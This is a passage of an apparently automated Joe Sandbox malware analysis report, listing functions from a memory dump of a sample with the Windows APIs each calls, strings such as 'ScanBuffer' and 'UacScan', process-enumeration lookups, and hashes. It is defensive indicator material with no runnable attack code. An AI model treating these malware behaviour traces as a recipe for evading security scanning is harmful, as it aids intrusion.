Instruction Fuzzy Hash: D1E06D71A002148FCB15DE6888C5A4637D8AB08750F90056DEC58EF34AD371E9208BD0

Function 027C7D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 027C7DB0

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction ID: 7fd444de3562070954e014b4e9f23cd4d5226b30646aa87dd69e44cfcf3b737b
Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction Fuzzy Hash: B5D05B723081107AD224A96B5C84EB75BDCCBC9770F10063DB698C3180D720CC0186B1

Function 027C7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,027E2A49,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,Initialize), ref: 027C7E47

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
Instruction ID: 9d65cc92ef84f59770e236b7172e9871b3d9b689733e0e47f946de471a06ffe4
Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
Instruction Fuzzy Hash: 7AC08CF22026040E5E9862FC2CC829A438E09443347F02B2DE038D61C2DB21D8222810

Function 027C7E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,027DF8CC,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,UacInitialize), ref: 027C7E23

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
Instruction ID: c5d3ec6a195de22b342d94de4aedfa2a4fb6e86a7f605ddd59aeb78a040cba24
Opcode Fuzzy Hash: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
Instruction Fuzzy Hash: 46C08CE32022000A5A5861FC1CD801A438C09443383B41B3DB038C62D2DB31C8122810

Function 027C4C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A
SysReAllocStringLen.OLEAUT32(027EBE78,027DE950,000000B4), ref: 027C4C62

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction ID: 95698e0c829b4b8393482de5ebd8036436b789bb0d2311a260e590a56fa93389
Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction Fuzzy Hash: 13D080785011015DDF3C9D75C57CA37736AD9D03063BCC2ADD8024A265EB21D400CB31

Function 027C4C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 027C4C37

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction ID: 7b228d3f36e2b4a1b692b130fcbdd2fe08b473938637cfa630667cf8dc7663fe
Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction Fuzzy Hash: 69C012A664122447EB315AB8DCD0756A2CCDB05395B6400ADD408D7255E360DC004664

Function 027EBB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,027EBB44,00000000,00000001), ref: 027EBB60

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 26f330c2df287d5dca33a4110d0cccb2dd8a9e18f94d4bfe6e3945d460dc30cd
Instruction ID: 7763ed7c7056e16c152a9fb3d77100e7edd43d50d96630e240cae669425c5cf5
Opcode Fuzzy Hash: 26f330c2df287d5dca33a4110d0cccb2dd8a9e18f94d4bfe6e3945d460dc30cd
Instruction Fuzzy Hash: FFC09BF07953003EF52156795CD1F33558DE344704F6114597605ED1D1D5D148504534

Function 027C4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 027C4BEB

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction ID: 91f80ea2d2f77a7f04fd2a00d96f689fbfc1d7a28ac336d891a5fea73eb3362f
Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction Fuzzy Hash: 93B0123C34820218FE1019720D30B3300CC0B60387FF400ED9E29D80C5FF00C0008832

Function 027C4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 027C4C03

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
Instruction ID: 8e056f411aa51dac71e0928f3f3c8f43100a7990cf6edf03fc2684b67544f237
Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
Instruction Fuzzy Hash: C8A022EC2003030A8F2B233C80B802B20333FE03003FAC0FC00000A0288F3AC000AC30

Function 027C1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,027C2000), ref: 027C16A4

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4d05cc4f428519aa57a12d156c342259dc5e9c64c94795d4d589c197af91a565
Instruction ID: 0013f8677826785e901ddf8bf8844d276b8972a58208b91fc4f65ac8250378c3
Opcode Fuzzy Hash: 4d05cc4f428519aa57a12d156c342259dc5e9c64c94795d4d589c197af91a565
Instruction Fuzzy Hash: 54F0F0B6B007946FD3219E5A9C80782BB90FB10310F11413DEA4897380C771A8148BD4

Function 027C16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,027C1FE4), ref: 027C1704

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 009fcd9514d272e6009af8181684d641ddc7571d84b6e83cbd4aff43db550d9d
Instruction ID: 4a1ef3e0617f6c9002f60a9a3bf60d3ccafc6a5d67f5841a2bf77b2c9fddf460
Opcode Fuzzy Hash: 009fcd9514d272e6009af8181684d641ddc7571d84b6e83cbd4aff43db550d9d
Instruction Fuzzy Hash: B6E086793003016FD7105A795D447127BD8EB58754F75447DF549DB282D660E8148B60

Non-executed Functions

Function 027DA95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,027DABE3,?,?,027DAC75,00000000,027DAD51), ref: 027DA970
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 027DA988
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 027DA99A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 027DA9AC
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 027DA9BE
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 027DA9D0
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 027DA9E2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 027DA9F4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 027DAA06
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027DAA18
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027DAA2A
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027DAA3C
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027DAA4E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 027DAA60
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 027DAA72
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 027DAA84
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 027DAA96

Strings

Module32Next, xrefs: 027DAA6A
Process32Next, xrefs: 027DA9FE
Process32First, xrefs: 027DA9EC
Module32First, xrefs: 027DAA58
Heap32Next, xrefs: 027DA9C8
Heap32ListFirst, xrefs: 027DA992
Module32FirstW, xrefs: 027DAA7C
kernel32.dll, xrefs: 027DA96B
Heap32First, xrefs: 027DA9B6
Process32FirstW, xrefs: 027DAA10
CreateToolhelp32Snapshot, xrefs: 027DA980
Heap32ListNext, xrefs: 027DA9A4
Module32NextW, xrefs: 027DAA8E
Thread32First, xrefs: 027DAA34
Toolhelp32ReadProcessMemory, xrefs: 027DA9DA
Thread32Next, xrefs: 027DAA46
Process32NextW, xrefs: 027DAA22

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: f340358cb708153560b8fad1950db445615fd34fdcd9feff645b2d6053e8bc89
Instruction ID: fd6768db622f7e425473422dcfbfe780900e2937157acfcbedc1d31ade7ca02f
Opcode Fuzzy Hash: f340358cb708153560b8fad1950db445615fd34fdcd9feff645b2d6053e8bc89
Instruction Fuzzy Hash: 0B311DF4A80720AFFB11EFB4DACCA263BBDBB4630072049A9A046DF245D3749854CF51

Function 027C58B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,027C7338,027C0000,027ED790), ref: 027C58D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 027C58E8
lstrcpynA.KERNEL32(?,?,?), ref: 027C5918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000), ref: 027C5A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338), ref: 027C5A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 027C5A45

Strings

GetLongPathNameA, xrefs: 027C58DF
kernel32.dll, xrefs: 027C58CC
\, xrefs: 027C59F5

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: da88ec2e5c93302add6b72a70843508378e0f22288ac2a5674df74b972b1d388
Instruction ID: bae7811482e8058d0bebd8237b346457918fbf78fef57becf7b471e9a02269d3
Opcode Fuzzy Hash: da88ec2e5c93302add6b72a70843508378e0f22288ac2a5674df74b972b1d388
Instruction Fuzzy Hash: 33415C71E00659AFDB11DAF8CC88ADEB7ADEB08300FA445ADA548F7241D731EE448F54

Function 027C5B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027C5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027C5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027C5BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027C5BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027C5C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027C5C97

Strings

Software\Borland\Delphi\Locales, xrefs: 027C5AE4
Software\Borland\Locales, xrefs: 027C5AA8, 027C5AC6

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: 5aeec2c1326c19787b0f3fb9ea384fc6624d18afe0f3904ba71bd5bd081d8d5b
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 5D317571E4021D2AEB36DAB4DC49BDFB7AD5B04380FA401FD9608F6185EA75EE448F50

Function 027C7F5C Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027C7F7D

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
Instruction ID: 0c07c84805d7ad6d24c55b03b03b686b025260fa85c499b5ca48bb1283dbefcd
Opcode Fuzzy Hash: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
Instruction Fuzzy Hash: 7211D2B5E00209AFDB05CFA9C981DAFF7F9EFC8704B14C56DA505EB254E671AA01CB90

Function 027CA74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
Instruction ID: fec753b062967bfd01023ab9c07d67117f239ed422796e8db86aa83daace2238
Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
Instruction Fuzzy Hash: AFE0D87570021817D312A9786C98DF6736DA75C311F20417EBD04D7340FEA09D404BE4

Function 027CB714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,027EC106,00000000,027EC11E), ref: 027CB722

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
